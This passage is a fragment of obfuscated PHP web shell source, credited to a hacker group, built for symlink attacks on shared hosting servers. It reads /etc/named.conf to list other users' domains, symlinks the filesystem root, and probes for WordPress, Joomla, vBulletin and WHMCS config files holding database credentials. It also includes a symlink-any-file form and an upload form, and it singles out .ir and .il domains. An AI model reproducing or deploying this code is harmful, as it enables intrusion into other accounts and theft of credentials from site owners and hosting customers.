    $IIIIIIIIlI1l=$IIIIIIIIlI1I[0];
    $IIIIIIIIlI11=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/includes/config.php';
    $IIIIIIIIllII=get_headers($IIIIIIIIlI11);
    $IIIIIIIIllIl=$IIIIIIIIllII[0];
    $IIIIIIIIllI1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/vb/includes/config.php';
    $IIIIIIIIlllI=get_headers($IIIIIIIIllI1);
    $IIIIIIIIllll=$IIIIIIIIlllI[0];
    $IIIIIIIIlll1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/forum/includes/config.php';
    $IIIIIIIIll1I=get_headers($IIIIIIIIlll1);
    $IIIIIIIIll1l=$IIIIIIIIll1I[0];
    $IIIIIIIIll11=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'public_html/clients/configuration.php';
    $IIIIIIIIl1II=get_headers($IIIIIIIIll11);
    $IIIIIIIIl1Il=$IIIIIIIIl1II[0];
    $IIIIIIIIl1I1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/support/configuration.php';
    $IIIIIIIIl1II=get_headers($IIIIIIIIl1I1);
    $IIIIIIIIl1lI=$IIIIIIIIl1II[0];
    $IIIIIIIIl1ll=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/client/configuration.php';
    $IIIIIIIIl1l1=get_headers($IIIIIIIIl1ll);
    $IIIIIIIIl11I=$IIIIIIIIl1l1[0];
    $IIIIIIIIl11l=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/submitticket.php';
    $IIIIIIIIl111=get_headers($IIIIIIIIl11l);
    $IIIIIIII1III=$IIIIIIIIl111[0];
    $IIIIIIII1IIl=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/client/configuration.php';
    $IIIIIIII1II1=get_headers($IIIIIIII1IIl);
    $IIIIIIII1IlI=$IIIIIIII1II1[0];
    $IIIIIIII1Ill = strpos($IIIIIIIII11l,'200');
    $IIIIIIII1I1I=' ';
    if (strpos($IIIIIIIII11l,'200') == true )
    {
    $IIIIIIII1I1I="<a href='".$IIIIIIIII1l1."' target='_blank'>Wordpress</a>";
    }
    elseif (strpos($IIIIIIIIlIIl,'200') == true)
    {
    $IIIIIIII1I1I="<a href='".$IIIIIIIII111."' target='_blank'>Wordpress</a>";
    }
    elseif (strpos($IIIIIIIIlIll,'200')  == true and strpos($IIIIIIII1III,'200')  == true )
    {
    $IIIIIIII1I1I=" <a href='".$IIIIIIIIl11l."' target='_blank'>WHMCS</a>";
    }
    elseif (strpos($IIIIIIIIl1lI,'200')  == true)
    {
    $IIIIIIII1I1I =" <a href='".$IIIIIIIIl1I1."' target='_blank'>WHMCS</a>";
    }
    elseif (strpos($IIIIIIIIl11I,'200')  == true)
    {
    $IIIIIIII1I1I =" <a href='".$IIIIIIIIl1ll."' target='_blank'>WHMCS</a>";
    }
    elseif (strpos($IIIIIIIIlIll,'200')  == true)
    {
    $IIIIIIII1I1I=" <a href='".$IIIIIIIIlII1."' target='_blank'>Joomla</a>";
    }
    elseif (strpos($IIIIIIIIlI1l,'200')  == true)
    {
    $IIIIIIII1I1I=" <a href='".$IIIIIIIIlIl1."' target='_blank'>Joomla</a>";
    }
    elseif (strpos($IIIIIIIIllIl,'200')  == true)
    {
    $IIIIIIII1I1I=" <a href='".$IIIIIIIIlI11."' target='_blank'>vBulletin</a>";
    }
    elseif (strpos($IIIIIIIIllll,'200')  == true)
    {
    $IIIIIIII1I1I=" <a href='".$IIIIIIIIllI1."' target='_blank'>vBulletin</a>";
    }
    elseif (strpos($IIIIIIIIll1l,'200')  == true)
    {
    $IIIIIIII1I1I=" <a href='".$IIIIIIIIlll1."' target='_blank'>vBulletin</a>";
    }
    else
    {
    continue;
    }
    $IIIIIIII1I1l = $IIIIIIIII1I1['name'] ;
    echo '<tr><td><a href=http://www.'.$IIIIIIIIIl11[1][0].'/>'.$IIIIIIIIIl11[1][0].'</a></td>
    <td>'.$IIIIIIII1I1I.'</td></tr>';flush();
    }
    }
    }
    }
    break;
    case 'sym':
    $IIIIIIIIIllI = @file('/etc/named.conf');
    if(!$IIIIIIIIIllI)
    {
    die (" can't read /etc/named.conf");
    }
    else
    {
    echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
    foreach($IIIIIIIIIllI as $IIIIIIIIIll1){
    if(eregi('zone',$IIIIIIIIIll1)){
    preg_match_all('#zone "(.*)"#',$IIIIIIIIIll1,$IIIIIIIIIl11);
    flush();
    if(strlen(trim($IIIIIIIIIl11[1][0])) >2){
    $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIIIl11[1][0]));
    $IIIIIIII1I1l = $IIIIIIIII1I1['name'] ;
    @symlink('/','sym/root');
    $IIIIIIII1I1l = $IIIIIIIIIl11[1][0];
    $IIIIIIII1I11 = '\.ir';
    $IIIIIIII1lII = '\.il';
    if (eregi("$IIIIIIII1I11",$IIIIIIIIIl11[1][0]) or eregi("$IIIIIIII1lII",$IIIIIIIIIl11[1][0]) )
    {
    $IIIIIIII1I1l = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$IIIIIIIIIl11[1][0].'</div>';
    }
    echo "
    <tr>
    
    <td>
    <div class='dom'><a target='_blank' href=http://www.".$IIIIIIIIIl11[1][0].'/>'.$IIIIIIII1I1l.' </a> </div>
    </td>
    
    
    <td>
    '.$IIIIIIIII1I1['name']."
    </td>
    
    
    
    
    
    
    <td>
    <a href='sym/root/home/".$IIIIIIIII1I1['name']."/public_html' target='_blank'>symlink </a>
    </td>
    
    
    </tr></div> ";
    flush();
    }
    }
    }
    }
    break;
    case 'file':
    echo '
    The file path to symlink
    
    <br /><br />
    <form method="post">
    <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
    <input type="text" name="symfile" value="file.name_sym ( Ex. :: 1.txt )" size="60"/><br /><br />
    <input type="submit" value="symlink" name="symlink" /> <br /><br />
    
    
    
    </form>
    ';
    $IIIIIIII1lIl = $_POST['file'];
    $symfile = $_POST['symfile'];
    $symlink = $_POST['symlink'];
    if ($symlink)
    {
    @symlink("$IIIIIIII1lIl","sym/$symfile");
    echo '<br /><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a>';
    }
    break;
    default:
    header("Location: $IIIIIIIIIlIl");
    }
    }else
    {
    echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
    echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
    if( $_POST['_upl'] == 'Upload') {
    if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])) {echo '<br /><br /><b>Uploaded successful !!<br><br>';}
    else {echo '<br /><br />Not uploaded !!<br><br>';}
    }
    echo '
    <br /><br /><div class="fot">Cod3d by Mr.Alsa3ek and Al-Swisre
    <br /><br />
    Muslims Hackers</div> ';
    }
    ;echo '
    
    </div>
    
    
    </body>
    
    </html>
    ';